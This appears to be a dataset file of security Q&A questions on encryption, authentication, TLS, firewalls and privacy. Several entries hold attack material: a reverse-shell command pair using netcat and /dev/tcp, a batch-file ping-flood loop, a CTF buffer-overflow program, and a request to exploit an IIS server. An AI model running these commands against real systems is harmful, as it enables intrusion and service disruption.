instruction
stringlengths
24
29.9k
Given an IP address of a server connecting to unknown clients via UDP, is it possible to find the IP address of all connected sessions on that server? I do not have access to the server, I would like to find out who is connecting to it.
My login for POST is over HTTPS. Therefore, I don't do anything to the provided password before submitting. And I don't see an issue there unless someone is watching your browser's developer console. (Tested the Google login. They also share the same approach.) But I've received a concern asking "malicious user succeed...
Say I own a domain name www.example.com and I'd like to host some resources on it, but being reasonably hidden from the public. Since a 256 bits has a sufficiently large entropy to prevent an exhaustive traversal, is it correct to consider any URL from my website that contains a hash, as hidden and secured ? For exampl...
Due to new laws in my country, any personal information must to be stored encrypted in the database. So, to be able to perform querys over this data I was thinking to keep an in-memory copy of these tables with decrypted data. For example, to get everyone that are more than 18 years old will be very hard if the DateOfB...
I plan to implement the following network configuration : Internet [(cable A)] Router A (192.168.0.x)[(WAN:cable A)(LAN1:cable B)(LAN2:)(LAN3:)(LAN4:)] Router B (192.168.1.x)[(WAN:)(LAN1:cable B)(LAN2:)(LAN3:)(LAN4:)] The first LAN port of router A is connected into the first LAN port of router B, but both routers are ...
There is a healthy debate around a series of stack overflow posts that refer to the "RunAs" command. Specifically the discussion is in reference to design decision that the folks at Microsoft made a long time ago, to users of this command to enter the users password in one specific way, Raymond Chen accurately summariz...
Apple claims in this year's WWDC that Face ID and Touch ID count for both Possession and Inherence identity factors, because they are using Biometrics (Inherence) to access the secure element on your phone (Possession) to retrieve a unique key. See here: https://developer.apple.com/videos/play/wwdc2020/10670/ I think b...
Access tokens that are passed to the public in an OAuth flow clearly need to be signed using asymmetric encryption (e.g. RSA) so that they cannot be altered by the client to gain access to new scopes, etc. Id tokens on the other hand are not used to access any resources on the server. So if the client is able to alter ...
Unless someone has my private ssh key, how is leaving an aws instance open to 0.0.0.0 but only on port 22 via ssh insecure? The ssh key would be distributed to a small set of people. I prefer to not need to indicate their source IP addresses in advance. I do see another similar question SSH brute force entry in aws e...
How do hackers change their voice.
the text is AAAAQwAAAG8AAABuAAAAZwAAAHIAAABhAAAAdAAAAHUAAABsAAAAYQAAAHQAAABpAAAAbwAAAG4AAABz I have no idea how to decode this
From my understanding, PGP supports the generation of a signature from plaintext using the sender's private key. Both the plaintext and the signature are encrypted using the session/symmetric key, and the session/symmetric key is encrypted using the receiver's public key. I assume the reason the signature is created fr...
I researched CPU vulnerabilities in the past, such as Specter and Meltdown. I read that one of those attacks is made easier if the code is a certain way. I cannot remember if it was related to being efficiently written, securely written, or some other reason. However, now I need this quote I cannot find it anywhere. Wh...
It's well known that GET requests with ?xx=yy arguments embedded can be altered in transit, and therefore are insecure. If I change the request to POST, and use HTTPS, then the parameters are in the body of the message, which is encrypted, and therefore difficult to hack, correct? Two more cases concern me. Suppose GE...
I have an Outbound Rule in my firewall called "Your Phone". Settings: All programs. In Customize Application Package Settings, it has "Apply to app package..." set with a long identifier starting with "S-1-15-2-1726375552-1729233799- etc. A search of my C-Drive and Registry found nothing. Apply to all programs and ser...
Does virtualbox provide enough entropy (random numbers) for the veracrypt program on the virtual machine? Is it cryptographically safe to use veracrypt inside a virtualbox in a windows 10 guest?
I have a table in my database where I store records to be processed later (basically orders that need to be invoiced or something similar, but this is not the important part). Since this software runs on-premises, admins control the database and they're able to insert records directly into it. They usually do this to m...
If I were to click a link on any of my devices, be it over text message, email, or from a webpage, and enter no information/actions with the target page. What is the worst that could happen?
I recently came across a behavior in a web application where the application (through the use of the header Content-Disposition: attachment) offers to download an HTML file instead of allowing it to get parsed by the browser. Interestingly, the GET requests to the URL that lets you download the HTML page passes the abs...
We have a client/server application which we set a port for both server and client to listen to and then enter a list of clients as IP (Host)/Port pair in the server's admin panel for monitoring clients. Then the server connects to clients and asks them to send some information and so on. It works fine in the local net...
A friend of mine is getting a text asking him to click on a link to view a video. The name is my first and last name. Most people do not spell their first name as mine but there is no phone number and the email address shows up under "other". I googled the email address and the email address belongs to a teacher in ...
Is there an additional risk associated with storing the master password to a vault inside the vault itself? I would assume not, since in order to decrypt the vault you must already have that password. But maybe I'm missing something? And without reuse concerns, anything that can steal the password from the unlocked vau...
I know that a VPS provider can track the client connected to a VPS (This Q/A) using RDP(Remote desktop protocol). But my question is about websites accessed from the VPS using a browser. Can they know anything about the main client (IP/Location/Local Time etc.) behind the RDP through the browser http (or https or any) ...
I'm seeing a strange key HKEY_CLASSES_ROOT\핵樦Ḁ耀 in my registry. I've seen a few issues like this (here and here) that relate to a UTF-16 <-> ASCII encoding bug, and I've tried translating encodings to see if this helps, but it doesn't seem to. I tested this with Python like so, after getting the byte values from an onl...
I read this answer, It explains how a multi-byte character exploit works in a decent way, the only way I could think of avoiding this problem is whitelisting all single-byte characters because of the fact, as D.W. mentioned in the linked answer, that there are also multi-byte sequences that the database might decode a...
I wish to privately submit my public key (without it being sniffed on the internet). I found that I have 3 ways to connect to the keyserver securely: https://<keyserver-url> hkps://<keyserver-url> (HKP over TLS) hkp://<keyserver-onion> [Using TOR] Which one of the 3 is most secure? I'm surprised to find that the Tor ...
I have a server and I want my iPhone to connect to it securely. However, I cannot just install the self-signed server certificate on my iPhone. When I install the profile (that's what they call the certificate), it says "Not verified". Normally, you would go to CA Trust settings and enable full trust for the certificat...
I have a cordova app that logs users in based on their devices model+platform+uuid. For example: Pixel 2Android39798721218. The way this works when a user uses a new device is detailed in the following: Users opens app App sends uuid code to checking page like: login-uuid?id=(uuid_here) If the uuid does not exist in t...
I was searching google to find a good printer to buy. To my horror, the next day I got a spam mail with theme "Print smarter at low price". Is this a coincidence or is my PC breached? What should I do? No alerts from Anti-Virus. Or can that webpage I opened install some malware? I didn't click on anything there.
Onyx Boox is a brand of e-book reader produced by Onyx International Inc, based in China. They have e-book readers based on Android OS. They have features that can violate user privacy or other accounts security: App store with optimized for e-book apps from other App stores: kindle, office, evernote and etc Account m...
This is a broader question but here a concrete example: From apache.org: File hashes are used to check that a file has been downloaded correctly. They do not provide any guarantees as to the authenticity of the file. I don't understand this part: 'They do not provide any guarantees as to the authenticity of the file....
It's about a CTF Challenge. I'm trying to execute a buffer overflow attack on a C program. The code is : #include<stdio.h> #include<string.h> #include<stdlib.h> #include <sys/types.h> #include <unistd.h> #include <stdint.h> int enable_flag() { printf("yay\n"); fflush(stdout); setreuid(geteuid(), getuid()); ...
The ASN.1 module for X.509 certificates as specified in RFC 5912 - Section 14 is as follows: TBSCertificate ::= SEQUENCE { version [0] Version DEFAULT v1, serialNumber CertificateSerialNumber, signature AlgorithmIdentifier{SIGNATURE-ALGORITHM, ...
I am backing up my files to a RAID mirrored HDD, that has full disk encryption (FDE) in place with LUKS. Until now I did this with rsync, but I recently switched to a new backup program that does file level encryption as well. So my question is: Is there any drawback of having multi levels of encryption, or is it actua...
I want to exploit a Microsoft IIS HTTPD 10.0 server open which is open in PORT 80. However there is no available exploits in Metasploit but there are few vulnerabilities in this site. Is it possible to make use of these vulnerabilities?
I would like to add a ticket based authentication mechanism to my network. Can you give me brief idea where do I start, which language should i write the protocol in and how do i get those in my custom OpenWrt firmware. Thank you! (Edit) In a traditional mesh network seamless connection is hard to achieve since as the ...
I know that apple provides per-file key encryption .i.e. a separate encryption key for each file exists on the apple device. The Hardware Key and the Passcode are required to generate these random keys. But once the device is unlocked then all the files can be accessed irrespective of the file protection class which si...
Being a hardware firewall, it can only see the TCP/UDP packets, how can they know that a packet coming inside is inbound or response to an outbound request?
I want to split my terminal sessions to different users, to compartmentalize them. If I sudo -i -u user1 in one terminal window, can user1 attack my main session? Everyone talks about sudo to escalate privileges, but I want to reduce them.
I'm reading an article from the Institute for Applied Network Security (IANS) titled "Ransomware 2.0: What It Is and What To Do About It", and there's a piece I don't understand. The article requires a subscription, but here's the excerpt (emphasis mine): [Attackers] typically threaten to release confidential data to ...
I am currently working on a product similar to smart locks that work with BLE identification. I can handle the hardware of the product very well (mechanics / electronics / embedded software), however, I am totally unaware of how to implement the security layer in the product and how to validate it if exists.
If there is a case where I wish to store sensitive data like a password, credit card information, or access tokens: Are web workers / service workers a secure environment, where such data can not be compromised? If so, what to do to really secure it? If not so, why not exactly?
Background In a standard 48-bit MAC address, the 7th (most significant) bit specifies whether it is a universally-administered address (UAA) or a locally-administered address (LAA). If it is 0, then the MAC address is a UAA and the first 24-bits are the organizationally-unique identifier (OUI) of the manufacturer of th...
I have a requirement where i need to store confidential data in an encrypted format in the url, i understand POST with body is better approach but it is not an option for me. I am thinking of using a pass phrase based AES 128 bit encryption for encrypting the query string parameter. The concern i have is that the url c...
In my web application I am using JWT. After a user loggs in, they are issued a refresh token and an access token. The refresh token is sent to cookie storage with the HTTP-only flag, while the access token is only saved in the memory of the front-end application. Basically once the browser is closed and re-opened, a ne...
Currently I can use $ gpg --expert --card-status to interact with smartcards that run the OpenPGP applet. Through trial-and-error, it seems that only the first card reader will interact with gpg. Using options that pass to scdaemon seem to be deprecated: $ gpg --reader-port 1 --card-status gpg: WARNING: "--reader-por...
Which hacking tool makes a request and does not show up on web-server logs? /en/latest/ has been requested over 116, we don't have this URL on the website at all! The request to that URL does not show up on web-server logs but I setup google analytics to track ad-blockers by loading the script on a different URL that a...
I quit my job to start my own SaaS product. I’m now looking to hire my first employee (another developer). I will be taking appropriate legal precautions to protect my IP, but I’m wondering what other reasonable actions that I can take to further protect my code / data. The last thing that I want happen is what happene...
It is my understanding that requests from a client browser to a webserver will initially follow the specified protocol e.g, HTTPS, and default to HTTP if not specified (Firefox Tested). On the server side it is desired to enforce a strict type HTTPS for all connections for the privacy of request headers and as a result...
Our solution includes a Windows tool that creates/opens a persisted RSA key stored in the TPM and encrypts/decrypt data using it. This works flawlessly. Now we need to decrypt that data but from a Linux OS on that same machine. Can it be done? The windows code uses NCrypt API (error handling etc removed): // Open TPM s...
So you create a .kbdx file, protected by a password. AFAIK in asymmetric key schemes and in WPA-AES brute-forcing consists of: Trying a random password on the private key / on the router If it doesn't log you in, try another. So, you immediately know if you hit the correct password. What about a password manager's da...
I have a question dealing with the EAP-AKA' used in 5G to authenticate clients coming from a 3GPP-Network. I read the latest specification on ETSI. The problem which I have is based on Step 2 on Page 37/38, where it says (at least I understood it like that), that when the UDM/ARPF got the SUCI it shall continue as show...
A previously asked question touches on topics which are very similar to what I am having trouble understanding. In a web application I am testing, SAML SSO is brokered using Keycloak. The SAML Response messages contain Encrypted Assertions (<saml:EncryptedAssertion>). Before the encrypted assertion is a Signature (<dsi...
I've coded my app to use https, but if a https transaction fails for any reason, I assume it's because the server isn't configured for https, and thereafter start all transactions with http. Seems like that's a vulnerability. Likewise, a script kiddie using a proxy to intercept the traffic on his client hardware would ...
While running the following command on Ubuntu 19.10, with OpenSSl 1.1.1c 28 May 2019: openssl req -config ${CNF_FILE} -key ${PRIVATE_FILE} -new -x509 -days 10950 -sha384 -extensions v3_ca -out ${CERT_FILE} I receive the following output: Error Loading extension section v3_ca 140710502360256:error:22097082:X509 V3 rou...
Let's say that we want to develop a blogging service where only people with an @example.com email can contribute. Prior to post submission, the user requests that a large random token be generated by the service and sent to their user@example.com email. This token is stored in the service's database and can then be use...
I have installed a Windows machine with update 1909 (build 18363.720 (March 2020) (On which I try to find vulnerabilities with nmap), which includes smb 3.1.1 with the latest fixed bugs. I created a shared folder on this machine and made the various configurations on the firewall so that the shared folder can be access...
I have a "cloud service", which consists of 2 parts: Web application, written in Next.js; MongoDB database (uses MongoDB Atlas). I allow users to sign in with GitHub and handle authentication using JWT. User can create & delete text files, which are saved in the database as so: { "name": string, "content": st...
I have recently started using Burp as a proxy for hunting bugs on websites and I see many submissions where people have intercepted and modified requests/responses to exploit certain logic flaws in web applications. However, this is possible only because we have installed Burp's certificate in our browser that allows i...
I am surprised that I couldn't find one concrete example of how to do root certificate rotation. For example: Root CA has 2 years validity period Intermediate CA has 9 months validity period leaf certificate has a 3 months validity period The renwal/replace time are: Root CA is going to be replaced every 1 year Inte...
I got a strange email and I just want to confirm my suspicions. For background, I have my own email server which I set up using iRedMail on a VPS. I have an acquaintance who most likely has me on their address book, although I don't have them on mine. I got a highly suspect email with "Urgent! <acquaintance's name>" as...
Let's assume an insecure communication channel. Alice makes a public key (we assume is PGP, but any asymmetric crypto could be used unless it doesn't have fingerprints for checking) and sends it to Bob. Then, Alice sends to Bob a photo of her key's fingerprint so Bob can check if a MITM attack occurred replacing the ke...
Some of my colleague give me 2 file of private key (one is encrypted and the other is decrypted) and a passphrase. But it seems that is the wrong passphrase. Is it even possible to recover the pass phrase with the ecrypted and decrypted private key files?
I just received my YubiKey and was playing with it. It works brilliantly but I couldn't help thinking what would happen if I would lose the key. Well, for Google you can print out some backup codes, so that's covered. But then I wanted to simulate a lost key for Amazon AWS. Apparently there is a page that allows you to...
This is a follow up question related to this answer. In short: I am importing the self signed Root CA certificate into android system via Settings -> Security -> Trusted Credentials -> install from SD path slightly differs on different android versions. Then point any browser (tested with Firefox, chrome and opera) to ...
I am currently working remotely and logging into my machine in the office through Cisco AnyConnect VPN. I was wonder what information can the company see. For example, do they have access to my traffic when not logged into my office machine through the vpn. Can they see my original IP address and where I am working fro...
I recently received a PDF file that, when attached to a gmail message, causes a warning to be displayed as follows: Encrypted attachment warning – Be careful with this attachment. This message contains 1 encrypted attachment that can't be scanned for malicious content. Avoid downloading it unless you know the sender a...
Here I see: If you believe you have found a security vulnerability that meets Microsoft's definition of a security vulnerability, please submit the report to MSRC at https://msrc.microsoft.com/create-report Also here: We want to know about a security vulnerability as soon as you’ve found it. But.. When signing into...
I had a typo and npm installed something that is similar in name to something very popular -- I was concerned about typosquatting. It's quite plausibly legitimate and just a coincidence. I looked at the corresponding package and didn't see anything wrong, though of course bad things can be hidden. I use nvm. I npm in...
I have stumbled upon a vulnerability in a web application and was wondering if it was exploitable / worth reporting. The bug is a CSRF which would allow an attacker to send friend requests to himself from other user accounts (in turn letting him view sensitive information about the victim accounts). The request is usua...
I noticed that Amazon's password reset relies on a 6 digit numeric PIN. Doesn't this reduce every user's account to a 1 in 10^5~ chance of being accessed through brute force guess factoring in a few retries (requesting OTP resend)? It seems that they put a captcha ahead of this and probably have some timeout where the ...
I have limited client devices and one server. I want to create a client-server secure connection while app installation but don't want human-interaction between devices and server like registration or login. After installation app, this client device should be already authenticated. Also want to avoid incorrect/fake de...
After a user logons to cognito, he receives access and ID tokens. the ID token contains sensitive info like phone number, email, etc.. From all standards - ID token should not be used to gain access to an API: https://auth0.com/docs/tokens?_ga=2.253547273.1898510496.1593591557-1741611737.1593591372 In the backend, to g...
Is there a source that monitors popular root stores for CAs controlled by government agencies? There are several "root stores" that maintain a list of trusted root CAs. These root stores are imported and used by thousands (millions?) of apps to determine which https certificates are trusted. Their contents has a huge i...
For client-side web applications that run in your machine (that you download at first visit - Blazor WebAssembly to be specific): Do I need to enable SSL (HTTPS) for this application or web server that hosts this application as well, or is it not needed in the end? Does only having API connection encrypted be enough? ...
Can you set a custom x-forwarded-host header in a CSRF form page (not xhr)?
We have a series of services exposed as web servers. Potentially, every web app could contact and be contacted by any other one. I want to secure the communications between the applications, which means ensuring that both parties are who they say they are. I want my applications to only be allowed to communicate betwee...
Good morning, my goal is to parse pgp keys but I am facing two problems. I don't know how pgp keys are encoded (for starters I deal with pgp keys generated by Rsa only) and nor do I know how to read the value of its main parameters To be more precise, with a RSA key, the instruction: openssl rsa -in name -text -noou...
One of our customers has the following requirement: according to SOC2 they need to block access to the CentOS root account. They mean any access, even with su root or sudo su. We have blocked the SSH access, but they claim it is not enough. Do you know where in SOC2 possible to find the requirements to block access to ...
I recently jumped onto the hypetrain for an unnamed email service and am currently on my way to update all my accounts on various websites to get most of my (future) data off Google's Gmail. During this adventure I came across a couple user-flows of changing your e-mail address which I would like to share (amounts like...
Everyone might have heard about Ripple20 vulnerability which has impacted millions of IoT devices. I know that using Nessus or Qualys, it is possible to identify this vulnerability. Is it possible to discover Ripple20 using tools such as Nmap or Wireshark?
I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP. Locally over TCP: Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000 Target terminal sends an interactive bash shell to the attacker: bash -i >& /dev/tcp/localhost/8000 0>&1; Su...
I have a telnet port open to my PC using the TCPClient in latest version of .net, it is only used for receiving text then parsing it and adding it into an SQL Database, my telnet server does not reply to the client in anyway. Apart from an SQL injection attack are there any major concerns I should be worried about rega...
I'm working on a project to implement SDN in a network. One of my flows is redirecting to the Suricata IDS and the flow works in layer 2 with MAC address. Since I've read that Snort only works in layer 3, I would like to know if it's possible to write a rule on Suricata that filters on MAC address of source and destina...
I have a web site and a service in a server. I'm developing the "Register User" and "Login" components. I've searched on the internet and I've found two protocols to login user using 'nonce' and 'salt', here and here. I've also found two explanations in order to use SSL/TLS, here and here, and bcrypt. I believe these t...
I have a typical IoT set up where a set of IoT devices running embedded Linux are connected to a cloud IoT server. The underlying carrier connection to the internet is over GSM. All communication to the server is secured with TLS implementation including the mutual authentication with server. The devices generate and s...
I receive emails from my bank with password protected PDF files, and they provide two passwords - either xxxx or yyyy. How is this possible?
Is there a native way, that is, one not requiring the purchase of an expensive third-party obfuscator, that a .NET desktop client program, deployed to the users' Windows desktops from a LAN server via ClickOnce, can store a symmetric key without running the risk of that key being obtained by someone with a disassemble...
Does it make sense to combine ZFS with LUKS2 for completely random-looking encryption on HDDs ? (Without luks-header on the disk of course, header placed elsewhere). The goal is to make a HDD really look like random data, since as I've learned ZFS built-in encryption is still telling us that it's actually a ZFS encryp...
Assuming there is a powerful adversary who can arbitrarily manipulate the sequence number of each tcp packet, then the following packet-reorder attack should be possible, right? Assuming the packet the attacker wants to disorder has the tcp sequence number n, he first allows the n+1, n+2, ..., n+m packets to be sent ou...
I'm wondering if using Javascript closures is a useful technique to limit exposing data to XSS? I realize it wouldn't prevent an attack, but would it reliably make an attack more difficult to execute, or would it only make my code more irritating to write and read (a waste of time)? I got the idea from the Auth0 docume...
I'm building a system that generates PGP key and store private key in secret vault. One thing I'm not fully understanding is the need for passphrase. I can generate a random passphrase during the key generation and then store it in the secret vault along side with the private key, but I'm wondering if it has any benefi...
I have multiple devices - a Samsung and a Lenovo tab, an Amazon Alexa, an HP laptop running Windows 7, and another running Windows 10. Bored, I tried to DoS my Windows 10 laptop using my Windows 7 laptop. I did it using a batch file with the ping command, like so: :loop ping 192.168.0.1 -l 65500 -w 100 -n 1 goto :loop ...
Imagine we have a dev team developers team lead scrum master ... When a new feature is planned to be implemented, should it be sent to the security team by the dev team lead (to evaluate whether it needs to be tested) or the someone from the security team should seek for them by himself by attending to meetings? We ...
I'm automating SQL injection using sqlmap. Is there someone who managed to parse sqlmap console output to only report critical findings (vulnerable pages to SQL injection)? The tool doesn't support output as JSON, and running the tool as API server, the results are in JSON format but it still reports all findings (basi...
I'm currently building a website where you have an account and can do "dangerous" things with it. I want to password-protect these things, so the user has to type their password, if they want to continue. I couldn't find any ressources on this, so I came up with this idea. My method works this way: User navigates to d...
Data protection laws including GDPR state: “Personal data shall be obtained only for one or more specified and lawful purposes, and shall not be further processed in any manner incompatible with that purpose or those purposes.” GDPR stipulates data should not be used in non-production systems unless anonymized or throu...
I have spent the last few days setting up a freeradius server with eap-tls as the only authentication method. I have used this old tutorial for setting up my own CA and generating the certificates and adjusted the older parameters to match the current ones. So far I managed to authenticate my iPhone 6 running iOS 11.1....
With enormous amounts of fighting with Windows/Microsoft Defender, I finally managed to download the "test virus" file from https://www.ikarussecurity.com/en/private-customers/download-test-viruses/ onto my desktop. However, Defender (on the command line) still just says: Scanning C:\Users\John Doe\Desktop\eicar_com.zi...
I'm currently doing research on evasion attacks that seek to bypass a Deep-learning based Network Intrusion Detection System. In order to achieve this, I need to know what the constraints are for the TCP window size field in the TCP packet header. Imagine a client has just sent the last TCP-ACK packet to a server in or...